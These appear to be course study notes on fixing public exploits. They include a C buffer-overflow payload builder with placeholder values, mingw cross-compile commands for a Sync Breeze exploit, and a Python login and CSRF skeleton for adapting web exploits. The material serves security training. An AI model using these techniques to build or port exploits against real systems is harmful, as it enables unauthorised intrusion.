Module 13: Fixing Exploits
Fixing Memory Corruption Exploits
Buffer Overflow in a Nutshell
General flow of a standard stack-based buffer overflow:
Create a large buffer to trigger the overflow.
Take control of EIP by overwriting a saved return address on the stack; the padding before it must be exactly the offset to EIP (found with a cyclic pattern or by trial), otherwise the overwrite lands on the wrong dword.
Place the chosen payload (shellcode) in the buffer, optionally preceded by a NOP sled so that a slightly inaccurate jump still lands in the payload.
Overwrite the return address with the address of an instruction such as JMP ESP (or a JMP/CALL to whichever register points into the buffer) so execution is redirected to the payload. The address is written in little-endian byte order and must not contain bad characters (such as null bytes) that the target would truncate or mangle.
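The layout described by the four steps above, written out as an added example (this is not the course's or any Exploit-DB exploit's code): a function that assembles [padding][return address][NOP sled][payload][filler] to a fixed total length, packs the address little-endian, and refuses to build a buffer whose address or payload contains a bad character. The offset, return address, bad-character list and four-byte payload are constructed placeholders, not values from a real target; the same routine is what you adjust when swapping in your own shellcode while keeping the original buffer length.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90

/* x86 is little-endian: 0x7c8f1234 must be stored as 34 12 8f 7c. */
static void put_le32(uint8_t *dst, uint32_t value) {
    dst[0] = (uint8_t)(value & 0xff);
    dst[1] = (uint8_t)((value >> 8) & 0xff);
    dst[2] = (uint8_t)((value >> 16) & 0xff);
    dst[3] = (uint8_t)((value >> 24) & 0xff);
}

/* Return 1 if any byte of buf appears in the bad-character list. */
static int has_bad_char(const uint8_t *buf, size_t len,
                        const uint8_t *bad, size_t nbad) {
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) return 1;
    return 0;
}

/* Build ['A' * eip_offset][ret_addr LE][NOP * nop_len][payload]['C' filler]
 * so the result is exactly total_len bytes (the length the original exploit
 * sends, which keeps the crash reproducible after the payload is swapped).
 * Returns total_len on success, 0 if the pieces do not fit in total_len or
 * out_cap, or if the return address / payload contains a bad character. */
size_t build_overflow(uint8_t *out, size_t out_cap, size_t total_len,
                      size_t eip_offset, uint32_t ret_addr, size_t nop_len,
                      const uint8_t *payload, size_t payload_len,
                      const uint8_t *bad, size_t nbad) {
    uint8_t ret[4];
    size_t used = eip_offset + sizeof ret + nop_len + payload_len;
    if (total_len > out_cap || used > total_len) return 0;
    put_le32(ret, ret_addr);
    if (has_bad_char(ret, sizeof ret, bad, nbad) ||
        has_bad_char(payload, payload_len, bad, nbad)) return 0;
    memset(out, 'A', eip_offset);                         /* padding to EIP */
    memcpy(out + eip_offset, ret, sizeof ret);            /* JMP ESP address */
    memset(out + eip_offset + sizeof ret, NOP, nop_len);  /* NOP sled */
    memcpy(out + eip_offset + sizeof ret + nop_len, payload, payload_len);
    memset(out + used, 'C', total_len - used);            /* keep length */
    return total_len;
}

int main(void) {
    /* Constructed placeholders: replace with the offset from your pattern
     * search, a JMP ESP address from a module without bad characters, and
     * real shellcode (here four int3 breakpoints stand in for it). */
    const uint8_t payload[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    const uint8_t bad[] = { 0x00, 0x0a, 0x0d };
    uint8_t buf[1024];
    size_t n = build_overflow(buf, sizeof buf, 800, 780, 0x7c8f1234u, 8,
                              payload, sizeof payload, bad, sizeof bad);
    if (n == 0) {
        fprintf(stderr, "buffer does not fit or contains bad characters\n");
        return 1;
    }
    printf("built %zu bytes; bytes at EIP offset: %02x %02x %02x %02x\n",
           n, buf[780], buf[781], buf[782], buf[783]);
    return 0;
}
```

Rejecting a buffer that exceeds the original total length is deliberate: a longer buffer can change where the overflow corrupts the stack and turn a working crash into a different one.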
Importing and Examining the Exploit
Be aware of the difference between compiled code and code run through an interpreter: a C exploit must be compiled (and possibly cross-compiled) for the target platform, whereas a Python or Perl exploit only needs a matching interpreter version and its modules.
Cross-Compiling Exploit Code
In most scenarios, it is best to use native compilers for the specific OS targeted, though this may not always be an option. In this case, use a cross-compiler like mingw-w64.
Installation: sudo apt install mingw-w64
Test out the compilation to determine if errors occur.
Example: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
In this specific case the linker reports an undefined reference to _imp__WSAStartup@8. Searching for the symbol shows that WSAStartup is a Winsock function (declared in winsock.h / winsock2.h and implemented by ws2_32.dll), so the header was found but the library was never linked. The fix is to add the -lws2_32 parameter to the previous command, placed after the source file so the linker resolves the symbol in order.
Revised example: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
Fixing the Exploit
No comment.
Changing the Overflow Buffer
No comment.
Fixing Web Exploits
Considerations and Overview
Key questions:
Does it initiate an HTTP or HTTPS connection?
Does it access a specific web application path or route?
Does the exploit leverage a pre-authentication vulnerability?
If not, how does the exploit authenticate to the web application?
How are the GET or POST requests crafted to trigger and exploit the vulnerability, and which HTTP method does each request use?
Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
Will oddities such as self-signed certificates disrupt the exploit?
Selecting the Vulnerability and Fixing the Code
Pretty straightforward: read the code, identify the request that actually triggers the vulnerability, and update the hardcoded values (host, port, scheme, application path, credentials) as needed.
Troubleshooting the "index out of range" Error
Print out the variable that raises the error (usually a list produced by split() or a regex match that is then indexed) before the index is applied, to see what the response actually contains versus what the exploit expects.
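The checklist above and the "index out of range" troubleshooting step, as one added example in Python (this is not the course's code nor any particular exploit): a skeleton that parameterises scheme, non-default port, install path and self-signed certificate handling, crafts GET and POST requests with the standard library only, and parses the response so that a missing token yields a diagnostic instead of an IndexError. The /app install path, the login.php route, the csrf_token field and the sample login page are assumptions constructed for the example.

```python
"""Added example (not from the original page or the course): an exploit
skeleton that makes the web-exploit checklist explicit and parses responses
without raising 'index out of range'. Routes, form field names and the
/app install path are assumptions."""
import re
import ssl
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Optional


@dataclass
class Target:
    host: str
    port: int = 80
    tls: bool = False             # HTTP or HTTPS?
    base_path: str = "/app"       # default install path; may have been changed
    verify_tls: bool = True       # False tolerates a self-signed certificate


def build_url(t: Target, route: str, params: Optional[dict] = None) -> str:
    """Join scheme, host, non-default port, install path and route."""
    scheme = "https" if t.tls else "http"
    default_port = 443 if t.tls else 80
    netloc = t.host if t.port == default_port else f"{t.host}:{t.port}"
    parts = [p.strip("/") for p in (t.base_path, route) if p.strip("/")]
    query = "?" + urllib.parse.urlencode(params) if params else ""
    return f"{scheme}://{netloc}/{'/'.join(parts)}{query}"


def tls_context(t: Target) -> Optional[ssl.SSLContext]:
    """Verification is disabled only when the target uses a self-signed cert."""
    if not t.tls:
        return None
    ctx = ssl.create_default_context()
    if not t.verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def build_request(t: Target, method: str, route: str,
                  data: Optional[dict] = None,
                  cookie: Optional[str] = None) -> urllib.request.Request:
    """Craft a GET or POST; POST bodies are form-encoded like a browser's."""
    body = urllib.parse.urlencode(data).encode() if data else None
    req = urllib.request.Request(build_url(t, route), data=body,
                                 method=method.upper())
    if body is not None:
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookie:
        req.add_header("Cookie", cookie)
    return req


# Constructed sample of the page the (assumed) login form returns.
SAMPLE_LOGIN_PAGE = ('<form method="post"><input type="hidden" '
                     'name="csrf_token" value="abc123"></form>')
TOKEN_RE = re.compile(r'name="csrf_token"\s+value="([^"]+)"')


def extract_token(html: str) -> Optional[str]:
    """Return the CSRF token or None. Writing re.findall(...)[0] here is the
    usual source of 'list index out of range' when the page differs from
    the one the exploit author saw (redirect, changed path, other version)."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def session_cookie(set_cookie: Optional[str]) -> Optional[str]:
    """'PHPSESSID=x; Path=/; HttpOnly' -> 'PHPSESSID=x'; None if absent."""
    return set_cookie.split(";", 1)[0].strip() if set_cookie else None


def login(t: Target, user: str, password: str) -> Optional[str]:
    """Post-authentication exploits need a session first. Returns the cookie
    to reuse, or None after printing what was actually received, so a
    parsing failure can be diagnosed instead of crashing."""
    ctx = tls_context(t)
    with urllib.request.urlopen(build_request(t, "GET", "login.php"),
                                context=ctx) as resp:
        page = resp.read().decode(errors="replace")
        cookie = session_cookie(resp.headers.get("Set-Cookie"))
    token = extract_token(page)
    if token is None:
        print("no csrf_token in response, first 300 bytes:", page[:300])
        return None
    form = {"username": user, "password": password, "csrf_token": token}
    req = build_request(t, "POST", "login.php", form, cookie)
    with urllib.request.urlopen(req, context=ctx) as resp:
        return session_cookie(resp.headers.get("Set-Cookie")) or cookie


if __name__ == "__main__":
    tgt = Target("10.0.0.5", 8443, tls=True, verify_tls=False)
    print(build_url(tgt, "login.php"))
    print(extract_token(SAMPLE_LOGIN_PAGE))
```

Every value the checklist asks about lives in the Target dataclass, so porting the exploit to a host with a different port, a custom install path or a self-signed certificate means changing one object rather than hunting through string literals.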